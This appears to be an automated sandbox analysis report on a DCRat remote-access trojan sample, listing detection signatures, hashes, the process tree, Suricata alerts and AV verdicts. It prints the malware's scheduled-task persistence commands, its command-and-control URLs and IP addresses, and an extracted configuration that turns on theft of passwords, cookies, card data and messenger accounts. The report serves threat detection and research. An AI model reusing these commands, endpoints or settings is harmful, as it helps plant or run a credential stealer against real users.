Windows Analysis Report
6uPVRnocVS.exe

Overview

General Information

Sample name: 6uPVRnocVS.exe (renamed because original name is a hash value)
Original sample name: 7a193e404a6285a41aba3019479d1749.exe
Analysis ID: 1589210
MD5: 7a193e404a6285a41aba3019479d1749
SHA1: e977d421b247ace0c630d118f05938460664c3b8
SHA256: 661b2c9879d7ae68512f820689f2198fdc2d71288ed0a6e747a0ae3f4a27f176
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DCRat
Yara detected Telegram RAT
AI detected suspicious sample
Creates processes via WMI
Drops PE files to the user root directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates or modifies windows services
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 6uPVRnocVS.exe (PID: 6492 cmdline: "C:\Users\user\Desktop\6uPVRnocVS.exe" MD5: 7A193E404A6285A41ABA3019479D1749)
    • wscript.exe (PID: 6676 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7052 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • System.exe (PID: 3604 cmdline: "C:\\ProgramData\ssh\System.exe" MD5: 9E0F8EFD67ACC61E4CB3B213B22E21DD)
          • schtasks.exe (PID: 3744 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4816 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5652 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3336 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5016 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4564 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6224 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1612 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4456 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1848 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7064 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6288 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6636 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6516 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6492 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7032 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Recovery\Idle.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7068 cmdline: schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6840 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2536 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6912 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7076 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6980 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Recovery\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6996 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6364 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5496 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5676 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5000 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4928 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 14 /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5772 cmdline: schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1748 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 6 /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4456 cmdline: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • Idle.exe (PID: 4476 cmdline: C:\Recovery\Idle.exe MD5: 9E0F8EFD67ACC61E4CB3B213B22E21DD)
  • Idle.exe (PID: 2944 cmdline: C:\Recovery\Idle.exe MD5: 9E0F8EFD67ACC61E4CB3B213B22E21DD)
  • lmXqPxTfNHomnnafzTOKZnFns.exe (PID: 1704 cmdline: "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe" MD5: 9E0F8EFD67ACC61E4CB3B213B22E21DD)
  • lmXqPxTfNHomnnafzTOKZnFns.exe (PID: 5324 cmdline: "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe" MD5: 9E0F8EFD67ACC61E4CB3B213B22E21DD)
  • cleanup
{"SCRT": "{\"M\":\")\",\"a\":\"!\",\"T\":\"~\",\"C\":\"-\",\"5\":\".\",\"I\":\"_\",\"J\":\";\",\"m\":\"(\",\"y\":\" \",\"0\":\"^\",\"k\":\"@\",\"9\":\"$\",\"6\":\"`\",\"i\":\"#\",\"4\":\",\",\"d\":\"<\",\"w\":\">\",\"O\":\"*\",\"t\":\"%\",\"e\":\"&\",\"L\":\"|\"}", "PCRT": "{\"V\":\"(\",\"j\":\"_\",\"U\":\"`\",\"R\":\"~\",\"Z\":\"|\",\"B\":\"%\",\"D\":\"$\",\"Q\":\">\",\"F\":\"@\",\"b\":\";\",\"t\":\"-\",\"h\":\",\",\"d\":\"!\",\"Y\":\")\",\"C\":\"<\",\"N\":\"^\",\"l\":\"*\",\"0\":\"#\",\"X\":\"&\",\"E\":\" \",\"1\":\".\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ZAWMDQZINKVcPXj9SzKG", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_DCRat_4 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
00000022.00000002.1886936604.0000000002681000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000024.00000002.1893402647.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000021.00000002.1896236954.0000000002401000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000004.00000002.1800682479.000000000329F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

              System Summary

              Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\ssh\System.exe, ProcessId: 3604, TargetFilename: C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe
              Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\6uPVRnocVS.exe", ParentImage: C:\Users\user\Desktop\6uPVRnocVS.exe, ParentProcessId: 6492, ParentProcessName: 6uPVRnocVS.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" , ProcessId: 6676, ProcessName: wscript.exe
              Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f, CommandLine: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\\ProgramData\ssh\System.exe", ParentImage: C:\ProgramData\ssh\System.exe, ParentProcessId: 3604, ParentProcessName: System.exe, ProcessCommandLine: schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f, ProcessId: 6224, ProcessName: schtasks.exe
              Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\6uPVRnocVS.exe", ParentImage: C:\Users\user\Desktop\6uPVRnocVS.exe, ParentProcessId: 6492, ParentProcessName: 6uPVRnocVS.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" , ProcessId: 6676, ProcessName: wscript.exe
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2025-01-11T18:07:16.689498+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.4 | 51288 | 5.101.152.15 | 80 | TCP
              2025-01-11T18:07:52.644367+0100 | 2850862 | 1 | Malware Command and Control Activity Detected | 5.101.152.15 | 80 | 192.168.2.4 | 53647 | TCP
              2025-01-11T18:09:12.682023+0100 | 2850862 | 1 | Malware Command and Control Activity Detected | 5.101.152.15 | 80 | 192.168.2.4 | 53928 | TCP
              2025-01-11T18:10:39.213109+0100 | 2850862 | 1 | Malware Command and Control Activity Detected | 5.101.152.15 | 80 | 192.168.2.4 | 53943 | TCP
              2025-01-11T18:07:20.259693+0100 | 1810009 | 1 | Potentially Bad Traffic | 192.168.2.4 | 53641 | 149.154.167.220 | 443 | TCP

              AV Detection

              Source: 6uPVRnocVS.exe, Avira: detected
              Source: http://monrul3t.beget.tech/c243cb78.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&60bc32dfe02b37c4e360dca40128d82d=989faea0cce1115f683b114ca580d3df&9d38ba4b7300523a983f9d7476ad101b=QYlZ2YlVWOiVTYjF2N3MjNjFDNyMjYwEDZ3I2YmdjZzUmNidjY5ETZ&md25=UA&vb=r948xSj667Ud7PLnWmgdAvira URL Cloud: Label: malware
              Source: http://monrul3t.beget.tech/, Avira URL Cloud: Label: malware
              Source: http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=ZtAvira URL Cloud: Label: malware
              Source: http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2NAvira URL Cloud: Label: malware
              Source: http://monrul3t.beget.tech, Avira URL Cloud: Label: malware
              Source: http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=QX9JSUNJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3IDNiR2NlZDZxQGZ3QDM2YzMyEmM1UjN0YDOjlTM4ITYyQmMlljZxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3WAvira URL Cloud: Label: malware
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Windows\LiveKernelReports\WinStore.App.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe, Avira: detection malicious, Label: VBS/Runner.VPG
              Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\ProgramData\ssh\System.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Recovery\upfc.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Recovery\Idle.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Users\user\AppData\Local\Temp\e65pqCzUjZ.bat, Avira: detection malicious, Label: BAT/Delbat.C
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe.5324.36.memstrminMalware Configuration Extractor: DCRat {"SCRT": "{\"M\":\")\",\"a\":\"!\",\"T\":\"~\",\"C\":\"-\",\"5\":\".\",\"I\":\"_\",\"J\":\";\",\"m\":\"(\",\"y\":\" \",\"0\":\"^\",\"k\":\"@\",\"9\":\"$\",\"6\":\"`\",\"i\":\"#\",\"4\":\",\",\"d\":\"<\",\"w\":\">\",\"O\":\"*\",\"t\":\"%\",\"e\":\"&\",\"L\":\"|\"}", "PCRT": "{\"V\":\"(\",\"j\":\"_\",\"U\":\"`\",\"R\":\"~\",\"Z\":\"|\",\"B\":\"%\",\"D\":\"$\",\"Q\":\">\",\"F\":\"@\",\"b\":\";\",\"t\":\"-\",\"h\":\",\",\"d\":\"!\",\"Y\":\")\",\"C\":\"<\",\"N\":\"^\",\"l\":\"*\",\"0\":\"#\",\"X\":\"&\",\"E\":\" \",\"1\":\".\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ZAWMDQZINKVcPXj9SzKG", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
              Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe, ReversingLabs: Detection: 81%
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe, ReversingLabs: Detection: 81%
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe, ReversingLabs: Detection: 81%
              Source: C:\Program Files\Windows Defender\lmXqPxTfNHomnnafzTOKZnFns.exe, ReversingLabs: Detection: 81%
              Source: C:\ProgramData\ssh\System.exe, ReversingLabs: Detection: 81%
              Source: C:\Recovery\Idle.exe, ReversingLabs: Detection: 81%
              Source: C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe, ReversingLabs: Detection: 81%
              Source: C:\Recovery\upfc.exe, ReversingLabs: Detection: 81%
              Source: C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe, ReversingLabs: Detection: 81%
              Source: C:\Users\Default\lmXqPxTfNHomnnafzTOKZnFns.exe, ReversingLabs: Detection: 81%
              Source: C:\Windows\LiveKernelReports\WinStore.App.exe, ReversingLabs: Detection: 81%
              Source: C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe, ReversingLabs: Detection: 81%
              Source: 6uPVRnocVS.exe, Virustotal: Detection: 65%
              Source: 6uPVRnocVS.exe, ReversingLabs: Detection: 71%
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe, Joe Sandbox ML: detected
              Source: C:\Windows\LiveKernelReports\WinStore.App.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe, Joe Sandbox ML: detected
              Source: C:\ProgramData\ssh\System.exe, Joe Sandbox ML: detected
              Source: C:\Recovery\upfc.exe, Joe Sandbox ML: detected
              Source: C:\Recovery\Idle.exe, Joe Sandbox ML: detected
              Source: 6uPVRnocVS.exe, Joe Sandbox ML: detected
              Source: 6uPVRnocVS.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\ProgramData\ssh\System.exe, Directory created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\ProgramData\ssh\System.exe, Directory created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\bc31d5a79a9161
              Source: C:\ProgramData\ssh\System.exe, Directory created: C:\Program Files\Windows Defender\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\ProgramData\ssh\System.exe, Directory created: C:\Program Files\Windows Defender\bc31d5a79a9161
              Source: unknown, HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:53639 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:53641 version: TLS 1.2
              Source: 6uPVRnocVS.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 6uPVRnocVS.exe
              Source: Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: mC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\6uPVRnocVS.exe, Code function: 0_2_000FA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_000FA5F4
